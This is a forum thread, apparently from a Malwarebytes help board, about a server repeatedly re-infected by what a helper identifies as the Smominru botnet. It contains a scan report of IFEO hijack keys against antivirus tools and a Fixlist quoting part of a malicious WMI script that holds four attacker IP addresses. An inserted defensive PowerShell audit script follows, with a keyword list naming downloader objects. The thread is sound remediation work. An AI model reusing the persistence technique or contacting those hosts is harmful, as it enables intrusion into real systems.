
Reacquiring Virus


Solved by AdvancedSetup

Hello,

I have been battling a virus for weeks. MWB finds and fixes the problem, but it just keeps coming back.

I am working with someone from Bleeping Computer, so I don't want to bring too many chefs to the table, but I would like to know if you have any helpful advice.

I use MWB Nebula...

Below is a report on what keeps coming back. It's always the same 92 infections...

 

Any assistance would be deeply appreciated...

Thank you!

 

Hello Mark Lonabaugh,

Based on your preferences, you are being notified that a new event has occurred for the following account:

Data Capture Solutions

  • Endpoint Name: Nav.Datacapture.prv
  • Domain/Workgroup: Datacapture.prv
  • IP: 192.168.0.17
  • Scan Date and Time: 08/05/2021 - 03:56:51 PM
  • Scan Type: ThreatScan
  • Detections Cleaned: 92
  • Severity: warning
  • Group: Default Group
  • Policy: Default Policy

Displaying 92 of 92 detections below - additional details can be viewed via the Scan Report.

Name                 Type        Category  Status       Path
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SHSTAT.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SHSTAT.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SHSTAT.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SHSTAT.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRAY.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRAY.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRAY.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RSTRAY.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RAVMOND.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RAVMOND.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RAVMOND.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RAVMOND.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCTRAY.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCTRAY.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCTRAY.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCTRAY.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCRTP.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCRTP.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCRTP.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\QQPCRTP.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KWATCH.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KWATCH.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KWATCH.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KWATCH.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVSRVXP.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVSRVXP.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVSRVXP.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVSRVXP.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMONXP.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMONXP.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMONXP.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMONXP.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSWEBSHIELD.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSWEBSHIELD.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSWEBSHIELD.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSWEBSHIELD.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSAFETRAY.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSAFETRAY.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSAFETRAY.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KSAFETRAY.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KISSVC.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KISSVC.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KISSVC.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KISSVC.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KAVSTART.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KAVSTART.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KAVSTART.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KAVSTART.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CMDAGENT.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CMDAGENT.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CMDAGENT.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CMDAGENT.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CFP.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CFP.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CFP.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\CFP.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGUARD.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGUARD.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGUARD.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGUARD.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGNT.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGNT.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGNT.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVGNT.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVCENTER.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVCENTER.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVCENTER.EXE
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AVCENTER.EXE|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360tray.exe
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360tray.exe|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360sd.exe
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360sd.exe|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360Safe.exe
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360Safe.exe|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rps.exe
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rps.exe|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rp.exe
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rp.exe|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360tray.exe
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360tray.exe|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360sd.exe
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360sd.exe|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360Safe.exe
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360Safe.exe|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rps.exe
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rps.exe|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rp.exe
RiskWare.IFEOHijack  Reg, Value  Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\360rp.exe|DEBUGGER
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\kvxp.kxp
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMonXP.kxp
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\kvxp.kxp
RiskWare.IFEOHijack  Reg, Key    Malware   Quarantined  HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\KVMonXP.kxp

 


  • Staff

Hello mlonabaugh,

Thank you for reaching out to us regarding this issue. I'm from the Nebula team that handles Malware Remediation. I was able to review your FRST logs from the BC forum and have made you a Fixlist that should resolve the issue. Please follow the steps below to use the attached Fixlist.txt:

1. Download the file Fixlist.txt that is attached to this post and save it to the same folder as FRST64.exe
2. Open FRST64.exe and click Fix
3. You should get a pop-up stating the Fix completed and that a Fixlog.txt was generated. Click OK.

Please attach the Fixlog.txt to your reply, and let me know if you're still seeing the scan results after rebooting the server.

Thanks again,

Fixlist.txt


  • Staff

Hello mlonabaugh,

No problem.  Copy the quoted text below into Notepad and save it as Fixlist.txt.

 

HKLM\...\Command Processor: C:\ProgramData\SQLAGENTVHC.exe <==== ATTENTION
cmd: certutil -hashfile "C:\ProgramData\SQLAGENTVHC.exe" sha256
C:\ProgramData\SQLAGENTVHC.exe
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicyScripts: Restriction <==== ATTENTION
Policies: C:\Users\aadmincopy\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\backup_svc\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\mlonabaugh\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\NTRSupport1\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\NTRSupport2\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\NTRSupport3\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\NTRSupport4\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\printing\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\SPAdmin\NTUSER.pol: Restriction <==== ATTENTION
Policies: C:\Users\SPService\NTUSER.pol: Restriction <==== ATTENTION
Powershell: Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
Powershell: Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer
WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"bleepyoumm_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"bleepyoumm_filter\":: <==== ATTENTION
WMI:subscription\__TimerInstruction->bleepyoumm_itimer:: <==== ATTENTION
WMI:subscription\__IntervalTimerInstruction->bleepyoumm_itimer:: <==== ATTENTION
WMI:subscription\__EventFilter->bleepyoumm_filter::[Query => select * from __timerevent where timerid="bleepyoumm_itimer"] <==== ATTENTION
WMI:subscription\ActiveScriptEventConsumer->bleepyoumm_consumer::[ScriptText => var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('69.30.200.178'+'\r\n'+'45.116.13.219'+'\r\n'+'150.107.76.227'+'\r\n'+'103.213.246.23');f.Close(); (the data entry has 2402 more characters).] <==== ATTENTION 

Thanks again,

Edited by AdvancedSetup
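The two persistence artifacts in this thread are the IFEO Debugger keys behind the 92 recurring detections in the first post and the WMI timer/filter/consumer chain that the Fixlist above removes. As an added, report-only example (not from the thread, Malwarebytes or FRST), the following Windows PowerShell script audits both so a defender can confirm after reboot that the fix stuck; it assumes an elevated Windows PowerShell 5.1+ session on the affected host, and the regex of "suspect" script keywords is my own heuristic.

```powershell
# Added example, not from the thread or from Malwarebytes/FRST. Report-only:
# nothing is modified or deleted. Run elevated in Windows PowerShell 5.1+.

# --- 1. IFEO Debugger hijacks -----------------------------------------------
# If HKLM\...\Image File Execution Options\<name>\Debugger is set, Windows runs
# that "debugger" in place of <name>. Pointing it at a bogus path silently
# kills the AV/tray processes listed in the 92 detections above.
$ifeoRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
)
$ifeoHits = foreach ($root in $ifeoRoots) {
    Get-ChildItem -Path $root -ErrorAction SilentlyContinue | ForEach-Object {
        $dbg = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            [pscustomobject]@{ Image = $_.PSChildName; Debugger = $dbg; Key = $_.Name }
        }
    }
}

# --- 2. WMI event-subscription persistence ----------------------------------
# The chain the Fixlist removes: __IntervalTimerInstruction raises __TimerEvent
# on a schedule, an __EventFilter selects it, a __FilterToConsumerBinding routes
# it to an ActiveScriptEventConsumer whose JScript runs as SYSTEM. That is what
# re-creates the cleaned artifacts after every scan.
$ns        = 'root/subscription'
$timers    = @(Get-CimInstance -Namespace $ns -ClassName __IntervalTimerInstruction)
$filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter)
$consumers = @(Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer)
$bindings  = @(Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding)

# Heuristic (my assumption): script consumers that download or launch things.
$suspectConsumers = @($consumers | Where-Object {
    $_.ScriptText -match 'ServerXMLHTTP|XMLHTTP|WScript\.Shell|FileSystemObject|powershell|cmd\.exe'
})

# --- 3. Report --------------------------------------------------------------
"== IFEO Debugger entries: $(@($ifeoHits).Count) =="
$ifeoHits | Format-Table Image, Debugger -AutoSize

"== Interval timers: $($timers.Count) =="
$timers | Format-Table TimerId, IntervalBetweenEvents -AutoSize

"== Filter -> consumer bindings: $($bindings.Count) =="
$bindings | ForEach-Object {
    # Filter/Consumer are CIM references whose key property is Name
    $fname = $_.Filter.Name
    $f = $filters | Where-Object Name -eq $fname
    [pscustomobject]@{ Filter = $fname; Query = $f.Query; Consumer = $_.Consumer.Name }
} | Format-Table -AutoSize

"== Suspect script consumers: $($suspectConsumers.Count) =="
$suspectConsumers | ForEach-Object {
    # The first 200 characters are enough to recognise a downloader stub
    $len = [Math]::Min(200, $_.ScriptText.Length)
    [pscustomobject]@{ Name = $_.Name; Script = $_.ScriptText.Substring(0, $len) }
} | Format-List
```

A clean host prints zero bindings and zero suspect consumers; any ActiveScriptEventConsumer bound to a timer-driven filter is worth treating as the re-infection source before quarantining IFEO keys again.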

Thank you. I will need to wait until the end of day to do this, but I will get back to you asap.

I also discovered that there were 7 sql jobs set to fire off at different times of the day. 

I am hoping that killing those jobs will do the trick...

 

Thanks again!!!!!


6 hours ago, AdvancedSetup said:

If there is an actual stored procedure or job calling it you might want to search out the stored procedures and see what they're doing.

https://jesspomfret.com/searching-stored-procedures/

 

Thank you for the suggestion...

I ran multiple queries and they all returned "(0 row(s) affected)" 

 

Thank you!!!


Hello mlonabaugh,

It looks like the Smominru botnet.

Could you please check if you have the following users in SQL Server: 

'users';
'usera';
'ps';
'fox';
'wwo';
'wq';
'so';
'gaibian';
'xxa';
'win7';
'vice';
'sz';
'ss';
'se';
'gd';
'syn';
'sasa';
'count';
'Myar';
'chica';
'masqer';
'system';
'Rolename';
'kisadminnew1';
'nanshou1433';
'nanshou';
'shitou';
'nanshou';

If so, disable them, but don't delete them yet.

Please choose where you want to receive help: here or at bleepingcomputer?

Important: Please do not delete anything by yourself. 

Edited by SQx

Good morning,

This forum is a bit easier to use, so if you don't mind let's stay here. I was not aware you had a presence in both places...

The only thing I did last night was disable the network connection to prevent any hacking while I slept, I will run your query asap...

Thank you!


Just to be clear... Is that a query you posted, or just a list of names you want me to visually inspect?

If you just want a visual inspection, the answer is no to all. I have 7 unknown users that were created right about when this all started. I have disabled all of them. (Not deleted)

They are: dcs, help, Mssql, Mssqla, sql, sqlup, web, websa...


2 hours ago, mlonabaugh said:

Just to be clear... Is that a query you posted, or just a list of names you want me to visually inspect?

Hello mlonabaugh,

Yes, I posted it just for visual inspection. Thanks.


3 hours ago, mlonabaugh said:

Good morning,

This forum is a bit easier to use, so if you don't mind let's stay here. I was not aware you had a presence in both places...

Hello mlonabaugh,

Sorry, I cannot help you here. I just want you to know that getting help at two places at once is just confusing.
